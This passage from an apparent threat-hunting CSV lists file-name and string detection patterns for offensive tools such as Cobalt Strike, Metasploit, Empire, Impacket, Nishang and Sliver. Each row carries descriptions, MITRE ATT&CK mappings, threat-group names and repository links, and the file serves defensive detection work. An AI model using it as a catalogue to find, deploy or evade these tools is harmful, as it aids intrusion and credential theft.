TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*http_malleable.py*",".{0,1000}http_malleable\.py.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*http_ntlmrelay.*",".{0,1000}http_ntlmrelay\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*http_owa_common.txt*",".{0,1000}http_owa_common\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*http_stager_client_header*",".{0,1000}http_stager_client_header.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*http_stager_server_append*",".{0,1000}http_stager_server_append.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*http_stager_server_header*",".{0,1000}http_stager_server_header.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*http_stager_server_prepend*",".{0,1000}http_stager_server_prepend.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*http_stager_uri_x64*",".{0,1000}http_stager_uri_x64.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*http_stager_uri_x86*",".{0,1000}http_stager_uri_x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike random C2 Profile generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/random_c2_profile","1","1","N/A","10","10","590","85","2023-01-05T21:17:00Z","2021-04-03T20:39:29Z" "*http1.x64.bin*",".{0,1000}http1\.x64\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*http1.x64.dll*",".{0,1000}http1\.x64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","160","26","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "*HTTPAES256Handler.*",".{0,1000}HTTPAES256Handler\..{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","386","76","2024-04-16T15:26:16Z","2019-05-12T11:00:35Z" "*httpattack.py*",".{0,1000}httpattack\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*httpattack.py*",".{0,1000}httpattack\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*httpattack.py*",".{0,1000}httpattack\.py.{0,1000}","offensive_tool_keyword","PrivExchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1091.001 - T1101 - T1201 - T1570","TA0006","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*httpattack.py*",".{0,1000}httpattack\.py.{0,1000}","offensive_tool_keyword","privexchange","Exchange your privileges for Domain Admin privs by abusing Exchange","T1053.005 - T1078 - T1069.002","TA0002 - TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/dirkjanm/PrivExchange","1","1","N/A","N/A","10","947","174","2020-01-23T19:48:51Z","2019-01-21T17:39:47Z" "*httpattacks/*.py*",".{0,1000}httpattacks\/.{0,1000}\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*HTTP-Backdoor.ps1*",".{0,1000}HTTP\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*HTTP-Backdoor.ps1*",".{0,1000}HTTP\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*http-c2_test.go*",".{0,1000}http\-c2_test\.go.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*HTTPClient.post('https://httpbin.org/post*",".{0,1000}HTTPClient\.post\(\'https\:\/\/httpbin\.org\/post.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","N/A","9","2","161","78","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z" "*HttpEvilClippyController*",".{0,1000}HttpEvilClippyController.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*HTTP-Login.ps1*",".{0,1000}HTTP\-Login\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","HTTP-Login.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*httpntlm.go*",".{0,1000}httpntlm\.go.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*httpntlm.old*",".{0,1000}httpntlm\.old.{0,1000}","offensive_tool_keyword","Gotato","Generic impersonation and privilege escalation with Golang. Like GenericPotato both named pipes and HTTP are supported.","T1003.003 - T1056.002 - T1550.001 - T1090","TA0005 - TA0004 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/iammaguire/Gotato","1","0","N/A","9","2","113","16","2021-06-07T21:19:58Z","2021-06-05T22:32:48Z" "*httppayload.bin*",".{0,1000}httppayload\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","10","10","360","56","2022-07-18T06:23:16Z","2021-02-08T10:52:39Z" "*HttpProxyScan_Log4J2.py*",".{0,1000}HttpProxyScan_Log4J2\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","76","45","2024-01-09T08:59:52Z","2021-01-20T13:03:45Z" "*http-redwarden*",".{0,1000}http\-redwarden.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","861","136","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" "*httprelayclient.py*",".{0,1000}httprelayclient\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*httprelayclient.py*",".{0,1000}httprelayclient\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - 